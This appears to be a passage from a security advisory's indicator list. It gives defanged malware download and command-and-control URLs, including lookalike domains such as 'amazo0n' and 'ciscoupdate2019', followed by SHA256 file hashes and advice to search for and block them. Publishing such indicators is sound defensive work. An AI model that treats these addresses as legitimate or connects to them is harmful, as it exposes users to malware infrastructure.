  • hxxp://185[.]117[.]75[.]116/tmp[.]php
  • hxxp://38[.]132[.]99[.]167/crf[.]txt
  • hxxp://185[.]244[.]149[.]218/JpeGDownload/[.]jpeg
  • hxxp://185[.]185[.]25[.]175/ref45[.]php
  • hxxp://185[.]185[.]25[.]175/sDownloads/[.]jpeg
  • hxxp://82[.]102[.]8[.]101/bcerrxy[.]php
  • amazo0n[.]serveftp[.]com/Data
  • zstoreshoping[.]ddns[.]net/Data/
  • hxxp://zstoreshoping[.]ddns[.]net/users[.]php?tname=
  • shopcloths[.]ddns[.]net
  • getgooogle[.]hopto[.]org
  • googleads[.]hopto[.]org
  • hxxp://www[.]shareliverpoolfc[.]co[.]uk/js/main[.]php
  • hxxp://valis-ti[.]cl/assets/main[.]php
  • hxxp://www[.]latvia-usa[.]org/wpincludes/customize/main[.]php
  • hxxp://googleads[.]hopto[.]org/data/ce28e899a8d3d00a[.]dat
  • hxxp://ciscoupdate2019[.]gotdns[.]ch/users[.]php?
  • hxxps://www[.]jsonstore[.]io/4de4d6d84d17638b3cd0eaf18857784aff27501be7d3dd89fad2b7ac2134f52e
  • hxxps://www[.]jsonstore[.]io/ddf35a64bd5ad54f9de868a84cdb21299a33d126e307ec3a868f65372402816a
  • hxxps://104[.]237[.]233[.]38:8080/YIZDGrM_4mRn_mb8PdhL_QfL2h49aAO0wfaxRxJAdq9pH2JeliMez10IwMk6PCnluziydTlV-/
  • hxxps://104[.]237[.]255[.]212:443/GfaBcrPI14rArcGvmQT2g3sW3ZtmqL6IU0Vg5oy21aOK4gvmvYx_TCP_whhSnyQH7/
  • hxxps://104[.]237[.]233[.]38:1022/aeacrE65xE9SdVN3CJwS9gbtNM84GL_ajl_AD2EoEOHrmbpQ5qC9J7GcSSZQ0JNBDnOulnMWgNy3FV2kcHRuM0u5NMo5Jv9Ks4zS5-pLkiYs4me/
  • hxxps://104[.]237[.]233[.]38:8080/nud2WCL9WzTiAOMCuFMboA18GWsmrc8k6VqGrXXfqVghYktellhTS7_tg-D64spqdv4sOJ/
  • hxxps://88[.]99[.]17[.]148:443/3gg7DuFHLwC8gPwW3z9rgnS1Is8F83B95PHYnVpk9219KbHn25IChwxSFR35a117i2Jz_OX9mUPAYRJw3NhMBxUVDp4iMOkzt/
  • hxxps://104[.]237[.]233[.]40:8443/zi5w0iDM6aLEgcWDnumYywaHa33BIPzaylNUPUECcNCmfNNcxzv05flJoB3wvWqH6Uf01vI-1yKF96/
  • hxxps://78[.]129[.]139[.]134:8864/lZkP68TtH_BpZGhmMwxNPwy0vjimgwDRfk01pV2Xu2FztbaevB6RzBUPRietWtBcuxru7tTsF3rZGFPbepd294BP2MGd/

Malware Hash (MD5/SHA1/SHA256)

  • 4d72dcd33379fe7a34f9618e692f659fa9d318ab623168cd351c18ca3a805af1
  • 7e7b6923f3e2ee919d1ea1c8f8d9a915c52392bd6f9ab515e4eb95fa42355991
  • 1dae45ea1f644c0a8e10c962d75fca1cedcfd39a88acef63869b7a5990c1c60b
  • 3deaa4072da43185d4213a38403383b7cefe92524b69ce4e7884a3ddc0903f6b
  • 36ccae4dffc70249c79cd3156de1cd238af8f7a3e47dc90a1c33476cf97a77b0
  • 9389cf41e89a51860f918f29b55e34b5643264c990fe54273ffbbf5336a35a45
  • dab2cd3ddfe29a89b3d80830c6a4950952a44b6c97a664f1e9c182318ae5f4da
  • 200c3d027b2d348b0633f8debbbab9f3efc465617727df9e3fdfa6ceac7d191b
  • 98f0f2c42f703bfbb96de87367866c3cced76d5a8812c4cbc18a2be3da382c95
  • 20bf83bf516b12d991d38fdc014add8ad5db03907a55303f02d913db261393a9
  • f5ef4a45e19da1b94c684a6c6d51b86aec622562c45d67cb5aab554f21eb9061
  • ff349c8bf770ba09d3f9830e22ab6306c022f4bc1beb193b3b2cfe044f9d617b
  • 95c650a540ed5385bd1caff45ba06ff90dc0773d744efc4c2e4b29dda102fcce
  • 6be18e3afeec482c79c9dea119d11d9c1598f59a260156ee54f12c4d914aed8f
  • 3c0c58d4b9eefea56e2f7be3f07cdb73e659b4db688bfbf9eacd96ba5ab2dfe5
  • 745b0e0793fc507d9e1ad7155beb7ac48f8a556e6ef06e43888cbefec3083f2f
  • 9580aaca2e0cd607eaf54c3eb933e41538dc10cd341d41e3daa9185b2a6341c4
  • 0ae4ce8c511a22da99c6edc4be86af1c5d3a7d2baf1e862925a503d8baae9fd7
  • c19095433ac4884d3205a59e61c90752ecb4e4fa6a84e21f49ed82d9ec48aa3c
  • 264f2ea4a8fad97e66d5ad41a57517b4645fe4c4959d55370919379b844b0750
  • 36be54812428b4967c3d25aafdc703567b42ad4536c089aefaef673ce36a958f
  • 9112505ff574b43dd27efc8afcf029841e1ea5193db90424b8b8b6b0e53c3437
  • d77d16c310cce09b872c91ca223b106f4b56572242ff5c4e756572070fac210f
  • d5b7a5ae4156676b37543a3183df497367429ae2d01ef33ebc357c4bdd9864c3
  • c63f1d364b9fa2c1023ce5a1b5fed12e1eba780c64276811c4b47743dfcbadbd
  • 0e7e3c2c7fe34afc02c6e672ae00bc4e432b300ec184dec08440fba91b664999
  • 88e02850c575504bb4476f0d519cec8e6a562b72d17ed50b9d465d8e0de50093
  • 67c3c5af27d19f25bc55c8e36ef19b57c03b211ce0637055721ae4b0e57011a7
  • 5194f84cc52093bb4978167a9f2d5c0903e9de0b81ca20f492e4fc78b6a77655
  • 3e6d39886d76ab3c08b26feae075e01e9fb3c90795fa52dd6c74e4ef8b590fe8
  • 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de
  • 5d3d5fa9c6ffa64b2af0c5ce357cb6a16085280d32eb321d679b57472ffb1019
  • 6ccb3882c516fafc54444e09f5c60738831292be0231939bec9168a0203e01bb
  • c175b2e9f0d73db293ca061ce95cdd92a423348aa162b14c158d97e9e7c3ff10
  • 66733fe27591347f6b28bc7750ba1b47b2853f711adcdb1270951c6b92e795d6
  • fbd63941a25253f5bafe69c9cc86c7effc6ff14b9adddd6f69e2f26ed39a77a4
  • 2ba871586176522fe75333e834c16025b01e1771e4c07bc13995adbfa77c45f5
  • 6a441b2303aeb38309bf2cb70f1c97213b0fa2cf7a0f0f8251fe6dc9965ada3b
  • d698c1d492332f312487e027d0665970b0462aceeeba3c91e762cff8579e7f72
  • 99e9a816e6b3fe7868b9c535ed13028f41089e0275eba1ba46ae7a62a7e47668
  • df1bd693c11893c5259c591dceef707aa0480ef5626529f8a5b0ef826e5c0dec
  • 4ba618c04cbdc47de2ab5f2c91f466bc42163fd541de80ab8b5e50f687bbb91c
  • e241b152e3f672434636c527ae0ebbd08c777f488020c98efce8b324486335c5
  • 6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b
  • 02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d
  • 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6
  • dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2
  • 26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43
  • 3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2
  • 5dbf6e347164d580665208b2bc04756857529121fd1c7861e84f18e8a6027924
  • e9617764411603ddd4e7f39603a4bdaf602e20126608b3717b1f6fcae60981f2
  • be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087
  • de4a1622b498c1cc989be1a1480a23f4c4e9cd25e729a329cfadb7594c714358
  • c2c2adecff2e517395571f4f9bee3b8cffed4521a8e1a3e3b363fd5e635f2eee
  • b2242bc51ebe2c3abc5a8691546827070540db43843b8328bdb81f450cd1254b
  • a4f9509e865d0a387cb8f0367e35ffd259b193f5270aacb67cb99942071c60cc
  • 484f78eb4a3bb69d62491fdb84f2c81b7ae131ec8452a04d6018a634e961cd6a
  • a35406d9ef82a68fbabb3c1e19911c9ed41bed335ef44a15037d1580c2b9dd12
  • efdec1ad0830359632141186917fd32809360894e8c0a28c28d3d0a71f48ec2f
  • f1a69e2041ab8ab190d029d0e061f107ef1223b553e97c302e973a3b3c80f83e
  • 31cf13e8579f0589424631c6be659480f9a204a50a54073e7d7fe6c9c81fa0db
  • 6ee79815f71e2eb4094455993472c7fb185cde484c8b5326e4754adcb1faf78e
  • 81c7787040ed5ecf21b6f80dc84bc147cec518986bf25aa933dd44c414b5f498
  • 999e4753749228a60d4d20cc5c5e27ca4275fe63e6083053a5b01b5225c8d53a
  • 8501c4df5995fd283e733ab00492f35aecb6ea2315b44e85abb90b3f067ccb64
  • 4bd93e4a9826a65ade60117f6136cb4ed0e17beae8668a7c7981d15c0bed705a
  • 503b2b01bb58fc433774e41a539ae9b06004c7557ac60e7d8a6823f5da428eb8
  • 04acd5721ad37ac5aa84e7f7e20986de0a532fb625a8bc75302a0f38c171cee3
  • 8ea17ed2cb662118937ed6fe189582cc11b2b73bb27a223d0468881ac5fcc08e
  • e2f82b074074955eeca3b0dd7b2831192bee49de329d5d4b36742c9721c8ad94
  • 121adcf3a52cafd0204ca4d4a42a9a09d6c9f559bcb997e51dba79c6a5a04efd
  • edde2eb39ed2f145c41e53e87d43add8de336d3e4d5c8d261f471d35edf3ed47
  • e60c802b692a503f4f91e8809bb961b5423c602f6fb374de1af4d983415de3f1
  • c84a61ba8c84ca1e879c4d8ac802ec260a8c426d89a09d8627a8c08ff6d88faf
  • 78da47f5a341909d1e6f50f8d39fdde8129ede86f04f3e88b2278e16c72e2461
  • 4e2cdfed691d6debab01c1733135b146817c94024177f9ef4b22726fac84322f
  • 3fee29fefe4aa9386a11a7a615dd052ff89e21d87eee0fff5d6f933d9384ede2
  • 3c75c2f7b299d9cc03a7ff91c568defaa39b4be02d58a75a85930ab23d2a2cff
  • 276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb
  • 818253f297fea7d8a2324ee1a233aabbaf3b0b4b9cdaa1ebd676fe00f2247388
  • f6707b5f41192353be3311fc7f48ee30465038366386b909e6cefaade70c91bc
  • de7b77f9c456d26e369263b6e1d001279b69e687b2d3029803ede21417d4f5fa
  • cc685f30e2f6039d12b4cbc92e38f1d64ba75ac12cb86afce5261a11cf4931de
  • 0faa2bb90de44ef87c7ee11165f7c702211dd603bdaea94af09cfecc3f525138
  • e6812fa0e12cc1913bfc7eb6dceb638429048e3cc59ce576c012a1d27fa20959
  • fb773f7324fdca584fff7da490820c7243a10555c8ff717d21c039a5ba337a43
  • 11761d6cf365932540ccb95b6f20aa45379736cfde33742a004fc8ceccad7daf
  • b9d4752b892759bb0cb166ab565f050f4b6385dd67f4288ff2231c69ab984a26
  • 604e09e01e2bfbc8f3680abd8005906e3fbcd2f4edaf24d80cd7105ec6f991b1
  • f2b8d7ce968ed8d6c33116bcfb8aeed97d89ec1ebf4f505c891020dc79d0ddd3
  • 336237b1ed2c99c0fef4c954490bd8282d6e46941d2ac2b6c9294a1aa9a254ed
  • 28a0131a9fda9fe2f2272c5091c77dc750da93d4a070dbd817af38723ea18f02
  • d320286e80d5785bbd14b10c00f5c9d38d9a781075d7d6ed4eb27c07d4788dbf
  • 24878dbde796c471a9d028f65421017afc087c958fb54c4b6c3cc7aeabbc1119
  • 57a9e2e6e715455827faefa982b4312b203189950fe285f1413174f5e812e408
  • 92bb4432cc9d2988ee4043e420a4df9c8caec4cd93ab258e07546781daa37086

Remediation

  • Search for these IOCs in your respective environments.
  • Block all threat indicators at your respective controls.

Copyright © Rewterz. All rights reserved.